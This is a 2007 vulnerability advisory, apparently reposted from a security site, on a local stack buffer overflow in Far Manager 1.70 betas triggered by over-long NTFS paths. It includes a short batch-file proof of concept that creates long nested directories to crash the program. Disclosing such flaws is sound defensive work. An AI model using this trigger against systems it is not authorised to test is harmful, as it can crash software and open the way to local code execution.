Far buffer overflow

2007.10.24
Credit: 3APA3A
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: Buffer overflow in Far Manager Affected: Far Manager 1.70beta1 and prior (saved EIP overflow) 1.70beta4 (off-by-one frame pointer overflow) Vendor: RARSoft Risk: Average (local code execution) Exploitable: Yes Remote: No Vendor Notified: January, 30 2003 I. Introduction: FAR is most convinient console file manager developed by Eugene Roshal II. Vulnerability. Stack based overflow occurs on paths >= 260 characters. III. Details. NTFS file system allows to create paths of almost unlimited length. But Windows API does not allow path longer than 256 bytes. To prevent Windows API from checking requested path \\?\ prefix may be used to filename. This is documented feature of Windows API. Paths longer than 260 characters will cause FAR to crash. Far 1.70beta4 implements the check of path length and does not allows to use paths longer than 160 characters. But due to bug in coding it's still possible to exploit FAR by using path of exactly 260 characters (off-by-one stack pointer overflow). IV. Exploit This .bat file demonstrates vulnerability (it creates directory with 2 subdirectories, first one will cause Far 1.70beta1 to crash, second one will cause Far 1.70beta4 to crash. @echo off SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB mkdir \\?\c:\%A% mkdir \\?\c:\%A%\%A% mkdir \\?\c:\%A%\%B% V. Vendor Will be patched in 1.70beta5 than released. -- http://www.security.nnov.ru /\_/ { , . } |+--oQQo->{ ^ }<-----+ | ZARAZA U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top